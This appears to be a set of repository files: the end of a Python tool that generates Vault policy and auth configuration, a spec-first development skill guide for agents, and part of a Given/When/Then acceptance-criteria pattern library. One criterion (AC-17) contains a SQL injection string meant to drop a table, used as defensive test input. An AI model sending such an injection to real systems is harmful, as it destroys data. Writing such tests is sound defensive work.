        "environment": environment,
        "policy_name": policy_name,
        "policy_hcl": generate_policy_hcl(app_name, valid, environment),
        "auth_commands": generate_auth_config(app_name, auth_method, policy_name, namespace),
        "secrets": details,
        "generated_at": datetime.now().isoformat(),
    }
    if unknown:
        result["warnings"] = [
            f"Unknown secret type '{u}' — skipped. Available: {list(SECRET_TYPE_MAP.keys())}"
            for u in unknown
        ]
    if namespace:
        result["namespace"] = namespace
    return result
def print_human(result):
    """Pretty-print the generated configuration; exit(1) on an error payload."""
    if "error" in result:
        print(f"ERROR: {result['error']}")
        if result.get("unknown"):
            print(f" Unknown types: {', '.join(result['unknown'])}")
        print(f" Available types: {', '.join(result['available_types'])}")
        sys.exit(1)
    for line in (
        f"=== Vault Configuration for {result['app_name']} ===",
        f"Auth Method: {result['auth_method']}",
        f"Environment: {result['environment']}",
        f"Policy Name: {result['policy_name']}",
        "",
    ):
        print(line)
    warnings = result.get("warnings")
    if warnings:
        for warning in warnings:
            print(f"WARNING: {warning}")
        print()
    print("--- Policy HCL ---")
    print(result["policy_hcl"])
    print()
    print(f"Write policy: vault policy write {result['policy_name']} {result['policy_name']}.hcl")
    print()
    print("--- Auth Method Setup ---")
    for step in result["auth_commands"]:
        print(f"# {step['description']}")
        print(step["command"])
        print()
    print("--- Secret Paths ---")
    for entry in result["secrets"]:
        caps = ", ".join(entry["capabilities"])
        print(f" {entry['type']:15s} {entry['path']:50s} [{caps}]")
def main():
    """CLI entry point: parse arguments and emit the Vault configuration."""
    epilog = textwrap.dedent("""\
        Secret types:
        db-creds Dynamic database credentials (read-only)
        db-admin Dynamic database credentials (read-write)
        api-key Static API keys in KV v2
        tls-cert TLS certificate issuance via PKI
        encryption Transit encryption-as-a-service
        ssh-cert SSH certificate signing
        config Application configuration secrets
        Examples:
        %(prog)s --app-name payment-svc --auth-method approle --secrets "db-creds,api-key"
        %(prog)s --app-name api-gw --auth-method kubernetes --secrets "db-creds,config" --namespace prod --json
        """)
    parser = argparse.ArgumentParser(
        description="Generate Vault policy and auth configuration from application requirements.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=epilog,
    )
    parser.add_argument("--app-name", required=True, help="Application or service name")
    parser.add_argument(
        "--auth-method",
        required=True,
        choices=["approle", "kubernetes", "oidc"],
        help="Vault auth method to configure",
    )
    parser.add_argument("--secrets", required=True, help="Comma-separated secret types (e.g., db-creds,api-key,tls-cert)")
    parser.add_argument("--environment", default="production", help="Target environment (default: production)")
    parser.add_argument("--namespace", help="Kubernetes namespace (for kubernetes auth method)")
    parser.add_argument("--json", action="store_true", dest="json_output", help="Output as JSON")
    args = parser.parse_args()
    config = build_output(args.app_name, args.auth_method, args.secrets,
                          args.environment, args.namespace)
    if args.json_output:
        print(json.dumps(config, indent=2))
    else:
        print_human(config)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,586 @@
---
name: "spec-driven-workflow"
description: "Use when the user asks to write specs before code, define acceptance criteria, plan features before implementation, generate tests from specifications, or follow spec-first development practices."
---
# Spec-Driven Workflow — POWERFUL
## Overview
Spec-driven workflow enforces a single, non-negotiable rule: **write the specification BEFORE you write any code.** Not alongside. Not after. Before.
This is not documentation. This is a contract. A spec defines what the system MUST do, what it SHOULD do, and what it explicitly WILL NOT do. Every line of code you write traces back to a requirement in the spec. Every test traces back to an acceptance criterion. If it is not in the spec, it does not get built.
### Why Spec-First Matters
1. **Eliminates rework.** 60-80% of defects originate from requirements, not implementation. Catching ambiguity in a spec costs minutes; catching it in production costs days.
2. **Forces clarity.** If you cannot write what the system should do in plain language, you do not understand the problem well enough to write code.
3. **Enables parallelism.** Once a spec is approved, frontend, backend, QA, and documentation can all start simultaneously.
4. **Creates accountability.** The spec is the definition of done. No arguments about whether a feature is "complete" — either it satisfies the acceptance criteria or it does not.
5. **Feeds TDD directly.** Acceptance criteria in Given/When/Then format translate 1:1 into test cases. The spec IS the test plan.
### The Iron Law
```
NO CODE WITHOUT AN APPROVED SPEC.
NO EXCEPTIONS. NO "QUICK PROTOTYPES." NO "I'LL DOCUMENT IT LATER."
```
If the spec is not written, reviewed, and approved, implementation does not begin. Period.
---
## The Spec Format
Every spec follows this structure. No sections are optional — if a section does not apply, write "N/A — [reason]" so reviewers know it was considered, not forgotten.
### 1. Title and Context
```markdown
# Spec: [Feature Name]
**Author:** [name]
**Date:** [ISO 8601]
**Status:** Draft | In Review | Approved | Superseded
**Reviewers:** [list]
**Related specs:** [links]
## Context
[Why does this feature exist? What problem does it solve? What is the business
motivation? Include links to user research, support tickets, or metrics that
justify this work. 2-4 paragraphs maximum.]
```
### 2. Functional Requirements (RFC 2119)
Use RFC 2119 keywords precisely:
| Keyword | Meaning |
|---------|---------|
| **MUST** | Absolute requirement. Failing this means the implementation is non-conformant. |
| **MUST NOT** | Absolute prohibition. Doing this means the implementation is broken. |
| **SHOULD** | Recommended. May be omitted with documented justification. |
| **SHOULD NOT** | Discouraged. May be included with documented justification. |
| **MAY** | Optional. Purely at the implementer's discretion. |
```markdown
## Functional Requirements
- FR-1: The system MUST authenticate users via OAuth 2.0 PKCE flow.
- FR-2: The system MUST reject tokens older than 24 hours.
- FR-3: The system SHOULD support refresh token rotation.
- FR-4: The system MAY cache user profiles for up to 5 minutes.
- FR-5: The system MUST NOT store plaintext passwords under any circumstance.
```
Number every requirement. Use `FR-` prefix. Each requirement is a single, testable statement.
### 3. Non-Functional Requirements
```markdown
## Non-Functional Requirements
### Performance
- NFR-P1: Login flow MUST complete in < 500ms (p95) under normal load.
- NFR-P2: Token validation MUST complete in < 50ms (p99).
### Security
- NFR-S1: All tokens MUST be transmitted over TLS 1.2+.
- NFR-S2: The system MUST rate-limit login attempts to 5/minute per IP.
### Accessibility
- NFR-A1: Login form MUST meet WCAG 2.1 AA standards.
- NFR-A2: Error messages MUST be announced to screen readers.
### Scalability
- NFR-SC1: The system SHOULD handle 10,000 concurrent sessions.
### Reliability
- NFR-R1: The authentication service MUST maintain 99.9% uptime.
```
### 4. Acceptance Criteria (Given/When/Then)
Every functional requirement maps to one or more acceptance criteria. Use Gherkin syntax:
```markdown
## Acceptance Criteria
### AC-1: Successful login (FR-1)
Given a user with valid credentials
When they submit the login form with correct email and password
Then they receive a valid access token
And they are redirected to the dashboard
And the login event is logged with timestamp and IP
### AC-2: Expired token rejection (FR-2)
Given a user with an access token issued 25 hours ago
When they make an API request with that token
Then they receive a 401 Unauthorized response
And the response body contains error code "TOKEN_EXPIRED"
And they are NOT redirected (API clients handle their own flow)
### AC-3: Rate limiting (NFR-S2)
Given an IP address that has made 5 failed login attempts in the last minute
When a 6th login attempt arrives from that IP
Then the request is rejected with 429 Too Many Requests
And the response includes a Retry-After header
```
### 5. Edge Cases and Error Scenarios
```markdown
## Edge Cases
- EC-1: User submits login form with empty email → Show validation error, do not hit API.
- EC-2: OAuth provider is down → Show "Service temporarily unavailable", retry after 30s.
- EC-3: User has account but no password (social-only) → Redirect to social login.
- EC-4: Concurrent login from two devices → Both sessions are valid (no single-session enforcement).
- EC-5: Token expires mid-request → Complete the current request, return warning header.
```
### 6. API Contracts
Define request/response shapes using TypeScript-style notation:
````markdown
## API Contracts
### POST /api/auth/login
Request:
```typescript
interface LoginRequest {
  email: string; // MUST be valid email format
  password: string; // MUST be 8-128 characters
  rememberMe?: boolean; // Default: false
}
```
Success Response (200):
```typescript
interface LoginResponse {
  accessToken: string; // JWT, expires in 24h
  refreshToken: string; // Opaque, expires in 30d
  expiresIn: number; // Seconds until access token expires
  user: {
    id: string;
    email: string;
    displayName: string;
  };
}
```
Error Response (401):
```typescript
interface AuthError {
  error: "INVALID_CREDENTIALS" | "TOKEN_EXPIRED" | "ACCOUNT_LOCKED";
  message: string;
  retryAfter?: number; // Seconds, present for rate-limited responses
}
```
````
### 7. Data Models
```markdown
## Data Models
### User
| Field | Type | Constraints |
|-------|------|-------------|
| id | UUID | Primary key, auto-generated |
| email | string | Unique, max 255 chars, valid email format |
| passwordHash | string | bcrypt, never exposed via API |
| createdAt | timestamp | UTC, immutable |
| lastLoginAt | timestamp | UTC, updated on each login |
| loginAttempts | integer | Reset to 0 on successful login |
| lockedUntil | timestamp | Null if not locked |
```
### 8. Out of Scope
Explicit exclusions prevent scope creep:
```markdown
## Out of Scope
- OS-1: Multi-factor authentication (separate spec: SPEC-042)
- OS-2: Social login providers beyond Google and GitHub
- OS-3: Admin impersonation of user accounts
- OS-4: Password complexity rules beyond minimum length (deferred to v2)
- OS-5: Session management UI (users cannot see/revoke active sessions yet)
```
If someone asks for an out-of-scope item during implementation, point them to this section. Do not build it.
---
## Bounded Autonomy Rules
These rules define when an agent (human or AI) MUST stop and ask for guidance vs. when they can proceed independently.
### STOP and Ask When:
1. **Scope creep detected.** The implementation requires something not in the spec. Even if it seems obviously needed, STOP. The spec might have excluded it deliberately.
2. **Ambiguity exceeds 30%.** If you cannot determine the correct behavior from the spec for more than 30% of a given requirement, the spec is incomplete. Do not guess.
3. **Breaking changes required.** The implementation would change an existing API contract, database schema, or public interface. Always escalate.
4. **Security implications.** Any change that touches authentication, authorization, encryption, or PII handling requires explicit approval.
5. **Performance characteristics unknown.** If a requirement says "MUST complete in < 500ms" but you have no way to measure or guarantee that, escalate before implementing a guess.
6. **Cross-team dependencies.** If the spec requires coordination with another team or service, confirm the dependency before building against it.
### Continue Autonomously When:
1. **Spec is clear and unambiguous** for the current task.
2. **All acceptance criteria have passing tests** and you are refactoring internals.
3. **Changes are non-breaking** — no public API, schema, or behavior changes.
4. **Implementation is a direct translation** of a well-defined acceptance criterion.
5. **Error handling follows established patterns** already documented in the codebase.
### Escalation Protocol
When you must stop, provide:
```markdown
## Escalation: [Brief Title]
**Blocked on:** [requirement ID, e.g., FR-3]
**Question:** [Specific, answerable question — not "what should I do?"]
**Options considered:**
A. [Option] — Pros: [...] Cons: [...]
B. [Option] — Pros: [...] Cons: [...]
**My recommendation:** [A or B, with reasoning]
**Impact of waiting:** [What is blocked until this is resolved?]
```
Never escalate without a recommendation. Never present an open-ended question. Always give options.
See `references/bounded_autonomy_rules.md` for the complete decision matrix.
---
## Workflow — 6 Phases
### Phase 1: Gather Requirements
**Goal:** Understand what needs to be built and why.
1. **Interview the user.** Ask:
- What problem does this solve?
- Who are the users?
- What does success look like?
- What explicitly should NOT be built?
2. **Read existing code.** Understand the current system before proposing changes.
3. **Identify constraints.** Performance budgets, security requirements, backward compatibility.
4. **List unknowns.** Every unknown is a risk. Surface them now, not during implementation.
**Exit criteria:** You can explain the feature to someone unfamiliar with the project in 2 minutes.
### Phase 2: Write Spec
**Goal:** Produce a complete spec document following The Spec Format above.
1. Fill every section of the template. No section left blank.
2. Number all requirements (FR-*, NFR-*, AC-*, EC-*, OS-*).
3. Use RFC 2119 keywords precisely.
4. Write acceptance criteria in Given/When/Then format.
5. Define API contracts with TypeScript-style types.
6. List explicit exclusions in Out of Scope.
**Exit criteria:** The spec can be handed to a developer who was not in the requirements meeting, and they can implement the feature without asking clarifying questions.
### Phase 3: Validate Spec
**Goal:** Verify the spec is complete, consistent, and implementable.
Run `spec_validator.py` against the spec file:
```bash
python spec_validator.py --file spec.md --strict
```
Manual validation checklist:
- [ ] Every functional requirement has at least one acceptance criterion
- [ ] Every acceptance criterion is testable (no subjective language)
- [ ] API contracts cover all endpoints mentioned in requirements
- [ ] Data models cover all entities mentioned in requirements
- [ ] Edge cases cover failure modes for every external dependency
- [ ] Out of scope is explicit about what was considered and rejected
- [ ] Non-functional requirements have measurable thresholds
**Exit criteria:** Spec scores 80+ on validator, and all manual checklist items pass.
### Phase 4: Generate Tests
**Goal:** Extract test cases from acceptance criteria before writing implementation code.
Run `test_extractor.py` against the approved spec:
```bash
python test_extractor.py --file spec.md --framework pytest --output tests/
```
1. Each acceptance criterion becomes one or more test cases.
2. Each edge case becomes a test case.
3. Tests are stubs — they define the assertion but not the implementation.
4. All tests MUST fail initially (red phase of TDD).
**Exit criteria:** You have a test file where every test fails with "not implemented" or equivalent.
### Phase 5: Implement
**Goal:** Write code that makes failing tests pass, one acceptance criterion at a time.
1. Pick one acceptance criterion (start with the simplest).
2. Make its test(s) pass with minimal code.
3. Run the full test suite — no regressions.
4. Commit.
5. Pick the next acceptance criterion. Repeat.
**Rules:**
- Do NOT implement anything not in the spec.
- Do NOT optimize before all acceptance criteria pass.
- Do NOT refactor before all acceptance criteria pass.
- If you discover a missing requirement, STOP and update the spec first.
**Exit criteria:** All tests pass. All acceptance criteria satisfied.
### Phase 6: Self-Review
**Goal:** Verify implementation matches spec before marking done.
Run through the Self-Review Checklist below. If any item fails, fix it before declaring the task complete.
---
## Self-Review Checklist
Before marking any implementation as done, verify ALL of the following:
- [ ] **Every acceptance criterion has a passing test.** No exceptions. If AC-3 exists, a test for AC-3 exists and passes.
- [ ] **Every edge case has a test.** EC-1 through EC-N all have corresponding test cases.
- [ ] **No scope creep.** The implementation does not include features not in the spec. If you added something, either update the spec or remove it.
- [ ] **API contracts match implementation.** Request/response shapes in code match the spec exactly. Field names, types, status codes — all of it.
- [ ] **Error scenarios tested.** Every error response defined in the spec has a test that triggers it.
- [ ] **Non-functional requirements verified.** If the spec says < 500ms, you have evidence (benchmark, load test, profiling) that it meets the threshold.
- [ ] **Data model matches.** Database schema matches the spec. No extra columns, no missing constraints.
- [ ] **Out-of-scope items not built.** Double-check that nothing from the Out of Scope section leaked into the implementation.
---
## Integration with TDD Guide
Spec-driven workflow and TDD are complementary, not competing:
```
Spec-Driven Workflow TDD (Red-Green-Refactor)
───────────────────── ──────────────────────────
Phase 1: Gather Requirements
Phase 2: Write Spec
Phase 3: Validate Spec
Phase 4: Generate Tests ──→ RED: Tests exist and fail
Phase 5: Implement ──→ GREEN: Minimal code to pass
Phase 6: Self-Review ──→ REFACTOR: Clean up internals
```
**The handoff:** Spec-driven workflow produces the test stubs (Phase 4). TDD takes over from there. The spec tells you WHAT to test. TDD tells you HOW to implement.
Use `engineering-team/tdd-guide` for:
- Red-green-refactor cycle discipline
- Coverage analysis and gap detection
- Framework-specific test patterns (Jest, Pytest, JUnit)
Use `engineering-team/spec-driven-workflow` for:
- Defining what to build before building it
- Acceptance criteria authoring
- Completeness validation
- Scope control
---
## Examples
### Full Spec: User Password Reset
```markdown
# Spec: Password Reset Flow
**Author:** Engineering Team
**Date:** 2026-03-25
**Status:** Approved
## Context
Users who forget their passwords currently have no self-service recovery option.
Support receives ~200 password reset requests per week, costing approximately
8 hours of support time. This feature eliminates that burden entirely.
## Functional Requirements
- FR-1: The system MUST allow users to request a password reset via email.
- FR-2: The system MUST send a reset link that expires after 1 hour.
- FR-3: The system MUST invalidate all previous reset links when a new one is requested.
- FR-4: The system MUST enforce minimum password length of 8 characters on reset.
- FR-5: The system MUST NOT reveal whether an email exists in the system.
- FR-6: The system SHOULD log all reset attempts for audit purposes.
## Acceptance Criteria
### AC-1: Request reset (FR-1, FR-5)
Given a user on the password reset page
When they enter any email address and submit
Then they see "If an account exists, a reset link has been sent"
And the response is identical whether the email exists or not
### AC-2: Valid reset link (FR-2)
Given a user who received a reset email 30 minutes ago
When they click the reset link
Then they see the password reset form
### AC-3: Expired reset link (FR-2)
Given a user who received a reset email 2 hours ago
When they click the reset link
Then they see "This link has expired. Please request a new one."
### AC-4: Previous links invalidated (FR-3)
Given a user who requested two reset emails
When they click the link from the first email
Then they see "This link is no longer valid."
## Edge Cases
- EC-1: User submits reset for non-existent email → Same success message (FR-5).
- EC-2: User clicks reset link twice → Second click shows "already used" if password was changed.
- EC-3: Email delivery fails → Log error, do not retry automatically.
- EC-4: User requests reset while already logged in → Allow it, do not force logout.
## Out of Scope
- OS-1: Security questions as alternative reset method.
- OS-2: SMS-based password reset.
- OS-3: Admin-initiated password reset (separate spec).
```
### Extracted Test Cases (from above spec)
```python
# Generated by test_extractor.py --framework pytest
class TestPasswordReset:
def test_ac1_request_reset_existing_email(self):
"""AC-1: Request reset with existing email shows generic message."""
# Given a user on the password reset page
# When they enter a registered email and submit
# Then they see "If an account exists, a reset link has been sent"
raise NotImplementedError("Implement this test")
def test_ac1_request_reset_nonexistent_email(self):
"""AC-1: Request reset with unknown email shows same generic message."""
# Given a user on the password reset page
# When they enter an unregistered email and submit
# Then they see identical response to existing email case
raise NotImplementedError("Implement this test")
def test_ac2_valid_reset_link(self):
"""AC-2: Reset link works within expiry window."""
raise NotImplementedError("Implement this test")
def test_ac3_expired_reset_link(self):
"""AC-3: Reset link rejected after 1 hour."""
raise NotImplementedError("Implement this test")
def test_ac4_previous_links_invalidated(self):
"""AC-4: Old reset links stop working when new one is requested."""
raise NotImplementedError("Implement this test")
def test_ec1_nonexistent_email_same_response(self):
"""EC-1: Non-existent email produces identical response."""
raise NotImplementedError("Implement this test")
def test_ec2_reset_link_used_twice(self):
"""EC-2: Already-used reset link shows appropriate message."""
raise NotImplementedError("Implement this test")
```
---
## Anti-Patterns
### 1. Coding Before Spec Approval
**Symptom:** "I'll start coding while the spec is being reviewed."
**Problem:** The review will surface changes. Now you have code that implements a rejected design.
**Rule:** Implementation does not begin until spec status is "Approved."
### 2. Vague Acceptance Criteria
**Symptom:** "The system should work well" or "The UI should be responsive."
**Problem:** Untestable. What does "well" mean? What does "responsive" mean?
**Rule:** Every acceptance criterion must be verifiable by a machine. If you cannot write a test for it, rewrite the criterion.
### 3. Missing Edge Cases
**Symptom:** Happy path is specified, error paths are not.
**Problem:** Developers invent error handling on the fly, leading to inconsistent behavior.
**Rule:** For every external dependency (API, database, file system, user input), specify at least one failure scenario.
### 4. Spec as Post-Hoc Documentation
**Symptom:** "Let me write the spec now that the feature is done."
**Problem:** This is documentation, not specification. It describes what was built, not what should have been built. It cannot catch design errors because the design is already frozen.
**Rule:** If the spec was written after the code, it is not a spec. Relabel it as documentation.
### 5. Gold-Plating Beyond Spec
**Symptom:** "While I was in there, I also added..."
**Problem:** Untested code. Unreviewed design. Potential for subtle bugs in the "bonus" feature.
**Rule:** If it is not in the spec, it does not get built. File a new spec for additional features.
### 6. Acceptance Criteria Without Requirement Traceability
**Symptom:** AC-7 exists but does not reference any FR-* or NFR-*.
**Problem:** Orphaned criteria mean either a requirement is missing or the criterion is unnecessary.
**Rule:** Every AC-* MUST reference at least one FR-* or NFR-*.
### 7. Skipping Validation
**Symptom:** "The spec looks fine, let's just start."
**Problem:** Missing sections discovered during implementation cause blocking delays.
**Rule:** Always run `spec_validator.py --strict` before starting implementation. Fix all warnings.
---
## Cross-References
- **`engineering-team/tdd-guide`** — Red-green-refactor cycle, test generation, coverage analysis. Use after Phase 4 of this workflow.
- **`engineering/focused-fix`** — Deep-dive feature repair. When a spec-driven implementation has systemic issues, use focused-fix for diagnosis.
- **`engineering/rag-architect`** — If the feature involves retrieval or knowledge systems, use rag-architect for the technical design within the spec.
- **`references/spec_format_guide.md`** — Complete template with section-by-section explanations.
- **`references/bounded_autonomy_rules.md`** — Full decision matrix for when to stop vs. continue.
- **`references/acceptance_criteria_patterns.md`** — Pattern library for writing Given/When/Then criteria.
---
## Tools
| Script | Purpose | Key Flags |
|--------|---------|-----------|
| `spec_generator.py` | Generate spec template from feature name/description | `--name`, `--description`, `--format`, `--json` |
| `spec_validator.py` | Validate spec completeness (0-100 score) | `--file`, `--strict`, `--json` |
| `test_extractor.py` | Extract test stubs from acceptance criteria | `--file`, `--framework`, `--output`, `--json` |
```bash
# Generate a spec template
python spec_generator.py --name "User Authentication" --description "OAuth 2.0 login flow"
# Validate a spec
python spec_validator.py --file specs/auth.md --strict
# Extract test cases
python test_extractor.py --file specs/auth.md --framework pytest --output tests/test_auth.py
```

View File

@@ -0,0 +1,497 @@
# Acceptance Criteria Patterns
A pattern library for writing Given/When/Then acceptance criteria across common feature types. Use these as starting points — adapt to your domain.
---
## Pattern Structure
Every acceptance criterion follows this structure:
```
### AC-N: [Descriptive name] (FR-N, NFR-N)
Given [precondition — the system/user is in this state]
When [trigger — the user or system performs this action]
Then [outcome — this observable, testable result occurs]
And [additional outcome — and this also happens]
```
**Rules:**
1. One scenario per AC. Multiple Given/When/Then blocks = multiple ACs.
2. Every AC references at least one FR-* or NFR-*.
3. Outcomes must be observable and testable — no subjective language.
4. Preconditions must be achievable in a test setup.
---
## Authentication Patterns
### Login — Happy Path
```markdown
### AC-1: Successful login with valid credentials (FR-1)
Given a registered user with email "user@example.com" and password "V@lidP4ss!"
When they POST /api/auth/login with email "user@example.com" and password "V@lidP4ss!"
Then the response status is 200
And the response body contains a valid JWT access token
And the response body contains a refresh token
And the access token expires in 24 hours
```
### Login — Invalid Credentials
```markdown
### AC-2: Login rejected with wrong password (FR-1)
Given a registered user with email "user@example.com"
When they POST /api/auth/login with email "user@example.com" and an incorrect password
Then the response status is 401
And the response body contains error code "INVALID_CREDENTIALS"
And no token is issued
And the failed attempt is logged
```
### Login — Account Locked
```markdown
### AC-3: Login rejected for locked account (FR-1, NFR-S2)
Given a user whose account is locked due to 5 consecutive failed login attempts
When they POST /api/auth/login with correct credentials
Then the response status is 403
And the response body contains error code "ACCOUNT_LOCKED"
And the response includes a "retryAfter" field with seconds until unlock
```
### Token Refresh
```markdown
### AC-4: Token refresh with valid refresh token (FR-3)
Given a user with a valid, non-expired refresh token
When they POST /api/auth/refresh with that refresh token
Then the response status is 200
And a new access token is issued
And the old refresh token is invalidated
And a new refresh token is issued (rotation)
```
### Logout
```markdown
### AC-5: Logout invalidates session (FR-4)
Given an authenticated user with a valid access token
When they POST /api/auth/logout with that token
Then the response status is 204
And the access token is no longer accepted for API calls
And the refresh token is invalidated
```
---
## CRUD Patterns
### Create
```markdown
### AC-6: Create resource with valid data (FR-1)
Given an authenticated user with "editor" role
When they POST /api/resources with valid payload {name: "Test", type: "A"}
Then the response status is 201
And the response body contains the created resource with a generated UUID
And the resource's "createdAt" field is set to the current UTC timestamp
And the resource's "createdBy" field matches the authenticated user's ID
```
### Create — Validation Failure
```markdown
### AC-7: Create resource rejected with invalid data (FR-1)
Given an authenticated user
When they POST /api/resources with payload missing required field "name"
Then the response status is 400
And the response body contains error code "VALIDATION_ERROR"
And the response body contains field-level detail: {"name": "Required field"}
And no resource is created in the database
```
### Read — Single Item
```markdown
### AC-8: Read resource by ID (FR-2)
Given an existing resource with ID "abc-123"
When an authenticated user GETs /api/resources/abc-123
Then the response status is 200
And the response body contains the resource with all fields
```
### Read — Not Found
```markdown
### AC-9: Read non-existent resource returns 404 (FR-2)
Given no resource exists with ID "nonexistent-id"
When an authenticated user GETs /api/resources/nonexistent-id
Then the response status is 404
And the response body contains error code "NOT_FOUND"
```
### Update
```markdown
### AC-10: Update resource with valid data (FR-3)
Given an existing resource with ID "abc-123" owned by the authenticated user
When they PATCH /api/resources/abc-123 with {name: "Updated Name"}
Then the response status is 200
And the resource's "name" field is "Updated Name"
And the resource's "updatedAt" field is updated to the current UTC timestamp
And fields not included in the patch are unchanged
```
### Update — Ownership Check
```markdown
### AC-11: Update rejected for non-owner (FR-3, FR-6)
Given an existing resource with ID "abc-123" owned by user "other-user"
When the authenticated user (not "other-user") PATCHes /api/resources/abc-123
Then the response status is 403
And the response body contains error code "FORBIDDEN"
And the resource is unchanged
```
### Delete — Soft Delete
```markdown
### AC-12: Soft delete resource (FR-5)
Given an existing resource with ID "abc-123" owned by the authenticated user
When they DELETE /api/resources/abc-123
Then the response status is 204
And the resource's "deletedAt" field is set to the current UTC timestamp
And the resource no longer appears in GET /api/resources (list endpoint)
And the resource still exists in the database (soft deleted)
```
### List — Pagination
```markdown
### AC-13: List resources with default pagination (FR-4)
Given 50 resources exist for the authenticated user
When they GET /api/resources without pagination parameters
Then the response status is 200
And the response contains the first 20 resources (default page size)
And the response includes "totalCount: 50"
And the response includes "page: 1"
And the response includes "pageSize: 20"
And the response includes "hasNextPage: true"
```
### List — Filtered
```markdown
### AC-14: List resources with type filter (FR-4)
Given 30 resources of type "A" and 20 resources of type "B" exist
When the authenticated user GETs /api/resources?type=A
Then the response status is 200
And all returned resources have type "A"
And the response "totalCount" is 30
```
---
## Search Patterns
### Basic Search
```markdown
### AC-15: Search returns matching results (FR-7)
Given resources with names "Alpha Report", "Beta Analysis", "Alpha Summary" exist
When the user GETs /api/resources?q=Alpha
Then the response contains "Alpha Report" and "Alpha Summary"
And the response does not contain "Beta Analysis"
And results are ordered by relevance score (descending)
```
### Search — Empty Results
```markdown
### AC-16: Search with no matches returns empty list (FR-7)
Given no resources match the query "xyznonexistent"
When the user GETs /api/resources?q=xyznonexistent
Then the response status is 200
And the response contains an empty "items" array
And "totalCount" is 0
```
### Search — Special Characters
```markdown
### AC-17: Search handles special characters safely (FR-7, NFR-S1)
Given resources exist in the database
When the user GETs /api/resources?q="; DROP TABLE resources;--
Then the response status is 200
And no SQL injection occurs
And the search treats the input as a literal string
```
---
## File Upload Patterns
### Upload — Happy Path
```markdown
### AC-18: Upload file within size limit (FR-8)
Given an authenticated user
When they POST /api/files with a 5MB PNG file
Then the response status is 201
And the response contains the file's URL, size, and MIME type
And the file is stored in the configured storage backend
And the file is associated with the authenticated user
```
### Upload — Size Exceeded
```markdown
### AC-19: Upload rejected for oversized file (FR-8)
Given the maximum file size is 10MB
When the user POSTs /api/files with a 15MB file
Then the response status is 413
And the response contains error code "FILE_TOO_LARGE"
And no file is stored
```
### Upload — Invalid Type
```markdown
### AC-20: Upload rejected for disallowed file type (FR-8, NFR-S3)
Given allowed file types are PNG, JPG, PDF
When the user POSTs /api/files with an .exe file
Then the response status is 415
And the response contains error code "UNSUPPORTED_MEDIA_TYPE"
And no file is stored
```
---
## Payment Patterns
### Charge — Happy Path
```markdown
### AC-21: Successful payment charge (FR-10)
Given a user with a valid payment method on file
When they POST /api/payments with amount 49.99 and currency "USD"
Then the payment gateway is charged $49.99
And the response status is 201
And the response contains a transaction ID
And a payment record is created with status "completed"
And a receipt email is sent to the user
```
### Charge — Declined
```markdown
### AC-22: Payment declined by gateway (FR-10)
Given a user with an expired credit card on file
When they POST /api/payments with amount 49.99
Then the payment gateway returns a decline
And the response status is 402
And the response contains error code "PAYMENT_DECLINED"
And no payment record is created with status "completed"
And the user is prompted to update their payment method
```
### Charge — Idempotency
```markdown
### AC-23: Duplicate payment request is idempotent (FR-10, NFR-R1)
Given a payment was successfully processed with idempotency key "key-123"
When the same request is sent again with idempotency key "key-123"
Then the response status is 200
And the response contains the original transaction ID
And the user is NOT charged a second time
```
---
## Notification Patterns
### Email Notification
```markdown
### AC-24: Email notification sent on event (FR-11)
Given a user with notification preferences set to "email"
When their order status changes to "shipped"
Then an email is sent to their registered email address
And the email subject contains the order number
And the email body contains the tracking URL
And a notification record is created with status "sent"
```
### Notification — Delivery Failure
```markdown
### AC-25: Failed notification is retried (FR-11, NFR-R2)
Given the email service returns a 5xx error on first attempt
When a notification is triggered
Then the system retries up to 3 times with exponential backoff (1s, 4s, 16s)
And if all retries fail, the notification status is set to "failed"
And an alert is sent to the ops channel
```
---
## Negative Test Patterns
### Unauthorized Access
```markdown
### AC-26: Unauthenticated request rejected (NFR-S1)
Given no authentication token is provided
When the user GETs /api/resources
Then the response status is 401
And the response contains error code "AUTHENTICATION_REQUIRED"
And no resource data is returned
```
### Invalid Input — Type Mismatch
```markdown
### AC-27: String provided for numeric field (FR-1)
Given the "quantity" field expects an integer
When the user POSTs with quantity: "abc"
Then the response status is 400
And the response body contains field error: {"quantity": "Must be an integer"}
```
### Rate Limiting
```markdown
### AC-28: Rate limit enforced (NFR-S2)
Given the rate limit is 100 requests per minute per API key
When the user sends the 101st request within 60 seconds
Then the response status is 429
And the response includes header "Retry-After" with seconds until reset
And the response contains error code "RATE_LIMITED"
```
### Concurrent Modification
```markdown
### AC-29: Optimistic locking prevents lost updates (NFR-R1)
Given a resource with version 5
When user A PATCHes with version 5 and user B PATCHes with version 5 simultaneously
Then one succeeds with status 200 (version becomes 6)
And the other receives status 409 with error code "CONFLICT"
And the 409 response includes the current version number
```
---
## Performance Criteria Patterns
### Response Time
```markdown
### AC-30: API response time under load (NFR-P1)
Given the system is handling 1,000 concurrent users
When a user GETs /api/dashboard
Then the response is returned in < 500ms (p95)
And the response is returned in < 1000ms (p99)
```
### Throughput
```markdown
### AC-31: System handles target throughput (NFR-P2)
Given normal production traffic patterns
When the system receives 5,000 requests per second
Then all requests are processed without queue overflow
And error rate remains below 0.1%
```
### Resource Usage
```markdown
### AC-32: Memory usage within bounds (NFR-P3)
Given the service is processing normal traffic
When measured over a 24-hour period
Then memory usage does not exceed 512MB RSS
And no memory leaks are detected (RSS growth < 5% over 24h)
```
---
## Accessibility Criteria Patterns
### Keyboard Navigation
```markdown
### AC-33: Form is fully keyboard navigable (NFR-A1)
Given the user is on the login page using only a keyboard
When they press Tab
Then focus moves through: email field -> password field -> submit button
And each focused element has a visible focus indicator
And pressing Enter on the submit button submits the form
```
### Screen Reader
```markdown
### AC-34: Error messages announced to screen readers (NFR-A2)
Given the user submits the form with invalid data
When validation errors appear
Then each error is associated with its form field via aria-describedby
And the error container has role="alert" for immediate announcement
And the first error field receives focus
```
### Color Contrast
```markdown
### AC-35: Text meets contrast requirements (NFR-A3)
Given the default theme is active
When measuring text against background colors
Then all body text meets 4.5:1 contrast ratio (WCAG AA)
And all large text (18px+ or 14px+ bold) meets 3:1 contrast ratio
And all interactive element states (hover, focus, active) meet 3:1
```
### Reduced Motion
```markdown
### AC-36: Animations respect user preference (NFR-A4)
Given the user has enabled "prefers-reduced-motion" in their OS settings
When they load any page with animations
Then all non-essential animations are disabled
And essential animations (e.g., loading spinner) use a reduced version
And no content is hidden behind animation-only interactions
```
---
## Writing Tips
### Do
- Start Given with the system/user state, not the action
- Make When a single, specific trigger
- Make Then observable — status codes, field values, side effects
- Include And for additional assertions on the same outcome
- Reference requirement IDs in the AC title
### Do Not
